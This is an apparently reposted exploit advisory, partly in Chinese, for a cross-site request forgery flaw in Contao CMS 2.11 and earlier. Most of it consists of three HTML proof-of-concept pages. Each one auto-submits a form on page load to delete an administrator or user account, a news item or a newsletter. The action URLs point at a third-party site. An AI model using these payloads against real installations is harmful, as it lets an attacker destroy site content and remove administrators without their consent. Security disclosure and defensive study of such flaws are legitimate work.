标题: ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article) 作者: Ivano Binetti (http://ivanobinetti.com) 下载 地址: http://www.contao.org/en/download. html 开发这网站: http://www.contao.org 影响版本: 2.11.0 (最新)及更低版本 测试平台: Debian Squeeze (6.0) +--------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------[多个缺陷by Ivano Binetti]-------------------------------------------+ Summary 1)程序介绍 2)缺陷描述 2.1 删除管理员或用户 2.2 删除新闻 2.3 删除信笺 +--------------------------------------------------------------------------------------------------------------------------------+ 1)程序介绍 Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that is easy to maintain". 2)缺陷描述 Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages (articles, news, newsletter and so on). 2.1 删除管理员或用户 <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to delete ADMIN/USER account</H2> <form method="POST" name="form0" action="http:// www.2cto.com /contao/main.php?do=user&act=delete&id=2"> </body> </html> Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase. 2.2 删除新闻 <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to 删除新闻</H2> <form method="POST" name="form0" action="http:// www.2cto.com /contao/main.php?do=news&act=delete&id=1"> </form> </body> </html> 2.3 删除新闻信笺 <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to 删除新闻信笺</H2> <form method="POST" name="form0" action="http:// www.2cto.com /contao/contao/main.php?do=newsletter&act=delete&id=1"> </form> </body> </html>
查看更多关于ContaoCMS (aka TYPOlight) <= 2.11 CSRF (删除管理员/删的详细内容...